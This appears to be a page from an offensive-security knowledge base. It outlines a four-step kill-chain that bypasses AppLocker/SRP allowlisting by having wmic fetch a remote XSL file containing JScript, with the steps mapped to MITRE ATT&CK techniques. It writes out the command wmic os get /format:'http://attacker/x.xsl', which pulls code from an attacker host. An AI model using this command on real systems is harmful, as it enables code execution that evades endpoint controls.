What starting position does this attack require?

The first step is JScript stager fires (T1059) — a execution primitive. Assumed environment: same as squiblydoo — endpoint enforces app allowlisting that trusts wmic.

What is the final impact of this kill-chain?

The final step lands on wmic os get /format remote XSL (LOL-WMIC), which falls under Execution. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

← RegistryDossier · 4 steps · 3 edges

Approved

wmic + XSL → AppLocker / SRP bypass

wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.

Filed by AD Knowledge BasePublished 2026-05-26

§ Kill-chainDrag · zoom · scroll

Execution

JScript stager fires

T1059 · Command and Scripting Interpreter

Persistence

Drop scheduled task / WMI subscription

W-SCHEDTASK-HIJACK · Scheduled Task Hijack

Resource Development

Host attacker XSL with JScript payload

T1583 · Acquire Infrastructure

Execution

wmic os get /format remote XSL

LOL-WMIC · wmic.exe XSL Execution

§ Context

Assumed environment: same as squiblydoo — endpoint enforces app allowlisting that trusts wmic.exe (signed). wmic is present on every Windows since Vista.

§ Steps

01
JScript stager firesExecution
T1059— Command and Scripting Interpreter
02
Drop scheduled task / WMI subscriptionPersistence
W-SCHEDTASK-HIJACK— Scheduled Task Hijack
03
Host attacker XSL with JScript payloadResource Development
T1583— Acquire Infrastructure
04
wmic os get /format remote XSLExecution
LOL-WMIC— wmic.exe XSL Execution

§ References

T1059Command and Scripting Interpreter
T1583Acquire Infrastructure

§ Frequently asked

What is the "wmic + XSL → AppLocker / SRP bypass" attack path?: wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting. It chains 4 steps drawn from real-world offensive-security techniques.
What starting position does this attack require?: The first step is JScript stager fires (T1059) — a execution primitive. Assumed environment: same as squiblydoo — endpoint enforces app allowlisting that trusts wmic.
What is the final impact of this kill-chain?: The final step lands on wmic os get /format remote XSL (LOL-WMIC), which falls under Execution. From here, an operator typically pivots into post-exploitation or maintains persistence.
How can defenders detect or prevent this attack?: Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

wmic + XSL → AppLocker / SRP bypass

§ Context

§ Steps

§ References

§ Frequently asked

§ Related dossiers

Log4Shell (CVE-2021-44228) → RCE → lateral

certutil + bitsadmin → AV-friendly stager chain

Squiblydoo: regsvr32 → remote SCT execution

USB drop in parking lot → HID payload → C2